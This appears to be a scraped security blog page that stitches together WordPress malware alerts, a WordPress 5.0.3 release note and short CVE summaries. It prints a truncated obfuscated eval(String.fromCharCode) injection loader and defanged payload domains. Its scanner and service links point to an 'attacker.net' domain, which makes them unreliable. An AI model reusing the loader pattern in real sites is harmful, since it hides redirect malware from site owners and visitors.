adrequest[.]xyz Malware hitting WordPress websites

We found this new malware targeting hundreds of WordPress installations, So far it’s found in the database and in core files.

Here is an example of it:


var _0x43tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, ..

REMOVED…

41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125));

It’s then loading this javascript file and causing random redirects to other websites:

hxxps://adrequest[.]xyz/ad.js

hxxps://adrequest[.]xyz/lady.php

This domain is newly registered:

Domain Name: ADREQUEST[.]XYZ
Registry Domain ID: D91391898-CNIC
Registrar WHOIS Server: whois.PublicDomainRegistry.com
Registrar URL: https://publicdomainregistry.com
Updated Date: 2019-01-19T12:14:39.0Z
Creation Date: 2019-01-19T12:12:28.0Z
Registry Expiry Date: 2020-01-19T23:59:59.0Z


You can use this free malware scanner to determine if your website is infected by this malware or not: 

https://scan.attacker.net

Sign up now and let us take care of that for your and get your website cleaned immediately!

https://attacker.net/website-security-plans-pricing


How to Tell if Your Website Has Been Hacked

How to tell if your website has been hacked?

  • Do you see any strange, unrecognized or inappropriate content on your site?
  • Your site started consuming more resources or running slow?
  • Do you see unrecognized users, admin users, FTP or email accounts on your site?
  • Unrecognized files or folders?
  • Customer reporting stolen credit card after purchasing something from your website?
  • Google Chrome, Firefox or other browsers showing a red warning when visiting your website?
  • Do you see any unrecognized ads, popups or redirects to other sites?
  • Your hosting provider suspended your hosting account?
  • If your site is listed as hacked or harmful in Google searches.
  • If you recieve a warning from Google webmaster tools or other blacklists.
  • If Google Adwords suspended your running Ads.

There are so many other signs! Signup now and let’s clean & protect your websites!

You can check your website’s security by using this free website malware scanner

https://scan.attacker.net

WordPress 5.0.3 is now available!

5.0.3 is a maintenance release that includes 37 bug fixes and 7 performance updates. The focus of this release was fine-tuning the new block editor, and fixing any major bugs or regressions.

Here are a few of the highlights:

For a full list of changes, please consult the list of tickets on Trac, changelog, or read a more technical summary on the Make WordPress Core blog.

You can download WordPress 5.0.3 or visit Dashboard → Updates on your site and click Update Now. Sites that support automatic background updates have already started to update automatically.

A new wave of the simpleoneline Malware

A new wave of the https://simpleoneline[.]online/online.js malware has been discovered hitting hundreds of WordPress websites. In most cases, it’s injected in the database and particularly found in the options table.

Check if your website is infected using this free malware scanner:

https://scan.attacker.net

Take a look at our malware removal service and https://attacker.net/website-security-plans-pricing

Rsync remote attack-CVE-2014-9512

rsync 3.1.1 allows remote attackers to write to arbitrary files via a symlink attack on a file in the synchronization path.

 

Timeline

January 5, 2015 MITRE reserved CVE
February 12, 2015 NVD published advisory

Authority references

Vendor & other references

WordPress theme directory traversal

Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php.

 

 

Timeline

February 11, 2015 NVD published advisory

Authority references

Exploits

 

WordPress plug-in arbitrary code execution

Multiple cross-site scripting (XSS) vulnerabilities in the Spider Facebook plugin before 1.0.11 for WordPress allow (1) remote attackers to inject arbitrary web script or HTML via the appid parameter in a registration task to the default URI or remote administrators to inject arbitrary web script or HTML via the (2) asc_or_desc, (3) order_by, (4) page_number, (5) serch_or_not, or (6) search_events_by_title parameter in (a) the Spider_Facebook_manage page to wp-admin/admin.php or a (b) selectpagesforfacebook or (c) selectpostsforfacebook action to wp-admin/admin-ajax.php.

 

Microsoft Internet Explorer arbitrary code execution-CVE-2015-0072

Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 10 and 11 allows remote attackers to bypass the Same Origin Policy and inject arbitrary web script or HTML via vectors involving an IFRAME element that triggers a redirect, a second IFRAME element that does not trigger a redirect, and an eval of a WindowProxy object, aka “Universal XSS (UXSS).”

 

 

 

Xen denial of service-CVE-2015-1563

The ARM GIC distributor virtualization in Xen 4.4.x and 4.5.x allows local guests to cause a denial of service by causing a large number messages to be logged.

Affected products

  • Xen 4.0.0
  • Xen 4.0.1
  • Xen 4.0.2
  • Xen 4.0.3
  • Xen 4.0.4
  • Xen 4.1.0
  • Xen 4.1.1
  • Xen 4.1.2
  • Xen 4.1.3
  • Xen 4.1.4
  • Xen 4.1.5
  • Xen 4.1.6.1
  • Xen 4.2.0
  • Xen 4.2.1
  • Xen 4.2.2
  • Xen 4.2.3
  • Xen 4.3.1
  • Xen 4.4.0
  • Xen 4.4.0 release candidate 1
  • Xen Xen 4.3.0

Authority references

Vendor & other references

Forum references